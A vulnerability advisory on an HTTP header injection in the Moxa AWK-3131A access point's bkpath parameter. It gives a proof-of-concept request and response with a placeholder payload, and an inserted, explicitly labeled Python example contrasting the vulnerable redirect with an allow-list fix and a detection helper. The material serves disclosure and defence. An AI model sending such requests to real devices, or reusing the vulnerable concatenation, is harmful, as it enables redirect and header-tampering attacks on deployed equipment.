### Summary
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter, which is copied into the Location header of the HTTP response.
### Tested Versions
Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1
### Product URLs
http://www.moxa.com/product/AWK-3131A.htm
### CVSSv3 Score
3.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N
### Details
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted HTTP request can inject a payload in the bkpath parameter, which is copied into the Location header of the HTTP response. This vulnerability can be exploited in order to execute a variety of other attacks.
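The following is an added example, not code from the advisory, from Cisco Talos, or from Moxa's firmware. It contrasts the pattern the advisory describes (a request parameter concatenated straight into the Location header) with a hardened version that only ever redirects to a fixed allow-list of site-relative pages, and it includes a small detection helper that flags bkpath values in a form body that fail the same check. The allow-list `ALLOWED_RETURN_PAGES`, the fallback page, the device address and all function names are assumptions made for the example; the real firmware's page set is not listed in the advisory. The sample form body is the one from the proof-of-concept request above.

```python
"""Validation of a return-page parameter before it is used in a Location header."""
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical allow-list of pages the web UI legitimately returns to after a
# settings POST. The real firmware's page set is not given in the advisory.
ALLOWED_RETURN_PAGES = {"/time_set.asp", "/index.asp"}
DEFAULT_PAGE = "/index.asp"

# Form body taken from the advisory's proof-of-concept request (bkpath=EVIL_INJECTION).
SAMPLE_BODY = (
    "iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st"
    "&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00"
    "&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun."
    "&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00"
    "&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600"
    "&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE"
)


def normalise_return_path(value):
    """Return the allow-listed site-relative path named by value, or None.

    Decodes once more than the web server would, so double-encoded line
    separators are still caught; rejects anything with CR/LF/NUL, a scheme,
    a host (including protocol-relative "//host"), or a page not on the list.
    """
    candidate = unquote(value or "")
    if any(ch in candidate for ch in "\r\n\x00"):
        return None  # header or line separators must never reach the response
    if candidate.startswith(("\\", "//")):
        return None  # browsers treat these as host-changing redirects
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return None  # absolute URL would send the user off the device
    path = "/" + candidate.lstrip("/")
    # Strict comparison: query strings or fragments also fail the check.
    return path if path in ALLOWED_RETURN_PAGES else None


def is_trusted_return_path(value):
    """Boolean form of normalise_return_path for use in detection rules."""
    return normalise_return_path(value) is not None


def vulnerable_location(device_ip, bkpath):
    """The pattern the advisory describes: untrusted input concatenated into Location."""
    return f"http://{device_ip}/{bkpath}"


def safe_location(device_ip, bkpath):
    """Hardened form: redirect only to an allow-listed page, else to a fixed default."""
    path = normalise_return_path(bkpath) or DEFAULT_PAGE
    return f"http://{device_ip}{path}"


def find_untrusted_bkpath(form_body):
    """Detection helper: bkpath values in a URL-encoded form body that fail the check."""
    fields = parse_qs(form_body, keep_blank_values=True)
    return [v for v in fields.get("bkpath", []) if not is_trusted_return_path(v)]


if __name__ == "__main__":
    ip = "192.0.2.1"  # documentation address standing in for <device IP>
    print("vulnerable:", vulnerable_location(ip, "EVIL_INJECTION"))
    print("hardened:  ", safe_location(ip, "EVIL_INJECTION"))
    print("flagged:   ", find_untrusted_bkpath(SAMPLE_BODY))
```

The allow-list approach is deliberately stricter than escaping: a redirect target that is not one of a handful of known pages has no legitimate use in a settings form, so the hardened handler never echoes the caller's value at all. The same check, applied to request bodies at a proxy or in log review, gives a simple indicator that the parameter is being tampered with.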
### Exploit Proof-of-Concept
Request
```
POST /forms/iw_webSetParameters HTTP/1.1
Host: <device IP>
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<device IP>/time_set.asp
Cookie: Password508=<valid token>
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 486
iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun.&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE
```
Response
```
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Mon Oct 31 17:33:45 2016
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Type: text/html
Location: http://<device IP>/EVIL_INJECTION
<html><head></head><body>
..This document has moved to a new <a href="http://<device IP>/EVIL_INJECTION">location</a>.
..Please update your documents to reflect the new location.
..</body></html>
```
### Mitigation
To significantly mitigate risk of exploitation, disable the web application before the device is deployed.
### Timeline
* 2016-11-14 - Vendor Disclosure
* 2017-04-10 - Public Release
### CREDIT
* Discovered by Patrick DeSantis of Cisco Talos.